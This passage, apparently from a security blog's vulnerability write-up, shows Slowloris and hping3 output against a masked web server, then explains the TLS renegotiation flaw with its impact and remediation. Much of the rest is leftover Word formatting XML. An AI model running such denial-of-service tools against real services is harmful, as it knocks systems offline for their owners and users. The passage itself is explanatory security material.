<span style="font-size: x-small;"><span lang="EN-US" style="background: none repeat scroll 0% 0% yellow;">Current
stats: Slowloris has now sent 500
packets successfully.</span><span lang="EN-US"></span></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span style="font-size: x-small;"><span lang="EN-US">This thread now sleeping for 2000 seconds...</span></span></div>
<br />
<br />
<u>Hping3 output</u><br />
<br />
<span style="font-size: x-small;"> hping3 -T -p 80 xxx.xxx.xxx</span><br />
<span style="font-size: x-small;"><br />HPING xxx.xxx.xxx (eth1 xxx.xxx.xxx): NO FLAGS are set, 40 headers + 0 data bytes<br />hop=1 TTL 0 during transit from ip=xxx.xxx.xx. name=xxx<br />hop=1 hoprtt=0.6 ms<br /><b>...[omitted]...</b><br />--- 192.168.0.2 hping statistic ---<br /><span style="background-color: yellow;">10 packets transmitted, 21 packets received, 0% packet loss</span></span><br />
<br />
<b>Explanation </b><br />
<br />
In this scenario we send a low bust of packages using Slowloris and then launched Hping3 in port 80 (the same port as Slowloris) and saw that because the Slowloris open too many connections start receiving more packages than send.<br />
<br />
<b>TLS Protocol Session Renegotiation Security Vulnerability</b><br />
<br />
TLS protocol is prone to a security vulnerability that allows for man-in-the-middle attacks and Denial of Service attacks. This issue does not allow attackers to decrypt encrypted data. More specifically, the issue exists in a way applications handle the session renegotiation process and may allow attackers to inject arbitrary plaintext into the beginning of application protocol stream. <br />
<br />
<ul>
<li>In case of the HTTP protocol used with the vulnerable TLS implementation, this attack is carried out by intercepting 'Client Hello' requests and then forcing session renegotiation. An unauthorized attacker can then cause the webserver to process arbitrary requests that would otherwise require valid client side certificate for authorization. The attacker will not be able to gain direct access to the server response.</li>
<li> Denial of Service attack is also be feasible. This attack further exploits the SSL secure Renegotiation feature to trigger thousands of renegotiation via single TCP connection and crush the service.</li>
</ul>
<br />
<b>Business Impact</b><br />
<br />
An adversary can potentially exploit the vulnerability and cause compromise of the confidentiality and availability of the vulnerable service. <br />
<br />
<b>Remediation</b><br />
<br />
<u>Man In The Middle Attack:</u><br />
<br />
<ul>
<li>OpenSSL workaround- OpenSSL has provided a version (0.9.8l) that has a workaround. Please refer to OpenSSL Change Log (Changes between 0.9.8k and 0.9.8l Section).</li>
<li> Microsoft workaround - Enable SSLAlwaysNegoClientCert on IIS 6 and above: Web servers running IIS 6 and later that are affected because they require mutual authentication by requesting a client certificate, can be hardened by enabling the SSLAlwaysNegoClientCert setting. This will cause IIS to prompt the client for a certificate upon the initial connection, and does not require a server-initiated renegotiation.</li>
</ul>
For Denial of Service Attack – No real solutions exists. The following steps can mitigate (but not solve) the problem:<br />
<br />
<ul>
<li>Disable SSL-Renegotiation</li>
<li>Install SSL Accelerator</li>
</ul>
<b>Example</b><br />
<br />
<!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:RelyOnVML/>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]--><br />
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EL</w:LidThemeOther>
<w:LidThemeAsian>JA</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
DefSemiHidden="false" DefQFormat="false" DefPriority="99"
LatentStyleCount="371">
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 9"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Indent"/>
<w:LsdException Locked="false" Priority="0" SemiHidden="true"
UnhideWhenUsed="true" Name="footnote text"/>
<w:LsdException Locked="false" Priority="0" SemiHidden="true"
UnhideWhenUsed="true" Name="annotation text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="header"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footer"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index heading"/>
<w:LsdException Locked="false" Priority="35" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of figures"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope return"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="line number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="page number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of authorities"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="macro"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="toa heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 5"/>
<w:LsdException Locked="false" Priority="10" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Closing"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Signature"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="true"
UnhideWhenUsed="true" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Message Header"/>
<w:LsdException Locked="false" Priority="11" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Salutation"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Date"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Block Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Hyperlink"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="FollowedHyperlink"/>
<w:LsdException Locked="false" Priority="22" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Document Map"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Plain Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="E-mail Signature"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Top of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Bottom of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal (Web)"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Acronym"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Cite"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Code"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Definition"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Keyboard"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Preformatted"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Sample"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Typewriter"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Variable"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Table"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation subject"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="No List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Contemporary"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Elegant"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Professional"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Balloon Text"/>
<w:LsdException Locked="false" Priority="59" Name="Table Grid"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Theme"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" QFormat="true"
Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" QFormat="true"
Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" QFormat="true"
Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" QFormat="true"
Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" QFormat="true"
Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" QFormat="true"
Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" SemiHidden="true"
UnhideWhenUsed="true" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="TOC Heading"/>
<w:LsdException Locked="false" Priority="41" Name="Plain Table 1"/>
<w:LsdException Locked="false" Priority="42" Name="Plain Table 2"/>
<w:LsdException Locked="false" Priority="43" Name="Plain Table 3"/>
<w:LsdException Locked="false" Priority="44" Name="Plain Table 4"/>
<w:LsdException Locked="false" Priority="45" Name="Plain Table 5"/>
<w:LsdException Locked="false" Priority="40" Name="Grid Table Light"/>
<w:LsdException Locked="false" Priority="46" Name="Grid Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="Grid Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="Grid Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 2"/>
